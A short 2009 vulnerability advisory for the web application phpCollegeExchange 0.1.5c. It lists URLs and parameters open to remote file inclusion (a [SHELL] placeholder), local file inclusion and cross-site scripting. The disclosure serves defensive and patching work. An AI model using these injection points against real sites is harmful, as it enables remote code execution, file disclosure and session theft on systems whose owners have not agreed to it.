phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities

2009.06.27
Credit: Cracker
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-2218 | CVE-2009-2219
CWE: CWE-22
CWE-98

[RFI] http://localhost/path/i_head.php?home=[SHELL] http://localhost/path/i_nav.php?home=[SHELL] http://localhost/path/user_new_2.php?home=[SHELL] http://localhost/path/books/allbooks.php?home=[SHELL] http://localhost/path/books/home.php?home=[SHELL] http://localhost/path/books/mybooks.php?home=[SHELL] [LFI] http://localhost/path/house/myrents.php?home=[LFI] [XSS] http://localhost/php pages/home.php?_SESSION[handle]=[XSS] http://localhost/path/i_head.php?home=[XSS] http://localhost/path/i_nav.php?home=[XSS] http://localhost/path/books/allbooks.php?home=[XSS] http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS] http://localhost/path/books/home.php?home=[XSS] http://localhost/path/books/home.php?_SESSION[handle]=[XSS] http://localhost/path/books/i_nav.php?home=[XSS]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top